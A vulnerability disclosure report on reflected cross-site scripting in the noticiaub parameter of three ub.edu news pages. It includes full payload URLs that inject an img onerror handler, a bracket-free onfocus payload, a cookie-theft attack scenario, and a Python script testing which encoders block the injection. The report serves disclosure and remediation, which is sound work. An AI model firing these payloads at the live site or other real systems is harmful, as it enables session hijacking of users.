Abstract
Arbitrary JavaScript can be injected into the pages http://www.ub.edu/noticies/cgi/event.pl?id={id}&noticiaub={noticia}, [...]/cerca.pl?noticiaub={noticia} and [...]/cercar.pl?noticiaub={noticia} through the noticiaub parameter they share (reflected cross-site scripting): the parameter value is written into the HTML response without being encoded.
Reproduction steps
- Visit http://www.ub.edu/noticies/cgi/event.pl?id=131212&noticiaub=%27%3E%3Cimg%20onerror=%22alert(document.domain)%22%20src=%22random%22%3E%3Cspan, http://www.ub.edu/noticies/cgi/cerca.pl?noticiaub=%27%3E%3Cimg%20onerror=%22alert(document.domain)%22%20src=%22random%22%3E%3Cspan, or http://www.ub.edu/noticies/cgi/cercar.pl?noticiaub=%27%3E%3Cimg%20onerror=%22alert(document.domain)%22%20src=%22random%22%3E%3Cspan. URL-decoded, the payload is '><img onerror="alert(document.domain)" src="random"><span: the leading ' and > close the single-quoted attribute and tag the value is reflected into, and the injected img element runs its onerror handler because the src cannot be loaded.
- The injected JavaScript runs and alert(document.domain) fires three times, showing that the script executes in the www.ub.edu origin.
What should be done?
HTML-encode the noticiaub parameter before it is written into the HTML response, using an encoder for the context it lands in. Because the value is reflected inside a single-quoted attribute, the encoder must escape ' as well as &, <, > and " (for example HTML::Entities::encode_entities in Perl, which escapes all five by default). Stripping or escaping only angle brackets is not enough in an attribute context: an attacker can close the attribute with a quote and add an event-handler attribute such as onfocus without using < or > at all.
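To make the attribute-context requirement concrete, the following Python script is an added example (it is not code from this report or from the ub.edu site). It models a search page that reflects noticiaub into a single-quoted value attribute; the template, the helper names and the second, bracket-free payload are assumptions, while the first payload is the one from the reproduction steps. The page is rendered three ways (no encoding, encoding only &, < and >, and full attribute encoding) and an HTML parser is used as the oracle: the reflection is safe only if the browser would see a single input element whose value attribute is exactly the submitted string and nothing else.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Payload from the report, URL-decoded:
#   '><img onerror="alert(document.domain)" src="random"><span
REPORT_PAYLOAD = unquote(
    "%27%3E%3Cimg%20onerror=%22alert(document.domain)%22%20src=%22random%22%3E%3Cspan"
)
# Constructed payload (assumption): breaks out of a single-quoted attribute
# without any < or >, so escaping only angle brackets does not stop it.
ATTR_PAYLOAD = "x' onfocus='alert(document.domain)' autofocus='"

# Assumed shape of the vulnerable markup: the search term is reflected into a
# single-quoted attribute, which is what the leading '> of the payload closes.
TEMPLATE = "<input type='text' name='noticiaub' value='{}'>"


def render_vulnerable(noticiaub):
    """No encoding at all: the behaviour the report describes."""
    return TEMPLATE.format(noticiaub)


def render_partial(noticiaub):
    """Escapes only &, < and >; quotes pass through unchanged."""
    return TEMPLATE.format(html.escape(noticiaub, quote=False))


def render_fixed(noticiaub):
    """Attribute-safe encoding: &, <, >, \" and ' are all escaped."""
    return TEMPLATE.format(html.escape(noticiaub, quote=True))


class StartTagCollector(HTMLParser):
    """Records every start tag with its decoded attributes, as a browser sees them."""

    def __init__(self):
        super().__init__()
        self.start_tags = []

    def handle_starttag(self, tag, attrs):
        self.start_tags.append((tag, attrs))


def reflects_safely(markup, noticiaub):
    """True only if parsing the page yields exactly one <input> whose value
    attribute is byte-for-byte the submitted string, with no extra tags or
    attributes (no injected img, no injected event handler)."""
    parser = StartTagCollector()
    parser.feed(markup)
    parser.close()
    expected = [("input", [("type", "text"), ("name", "noticiaub"), ("value", noticiaub)])]
    return parser.start_tags == expected


if __name__ == "__main__":
    renderers = [
        ("vulnerable", render_vulnerable),
        ("partial", render_partial),
        ("fixed", render_fixed),
    ]
    for name, render in renderers:
        for payload in (REPORT_PAYLOAD, ATTR_PAYLOAD):
            markup = render(payload)
            print(f"{name:10s} safe={reflects_safely(markup, payload)!s:5s} {markup}")
```

Running the script shows that the partial encoder blocks nothing in this context: with the report's payload the parser still attaches an onerror attribute to the input, and the bracket-free payload passes through untouched. Only the attribute-aware encoder produces a page where the submitted text round-trips as plain attribute content.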
Attack scenario
An attacker could craft a URL carrying a JavaScript payload which, when opened by another UB member, sends that user's session cookies to the attacker (for instance the sensitive UBSess cookie on ub.edu, which is accessible via HTTP).
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.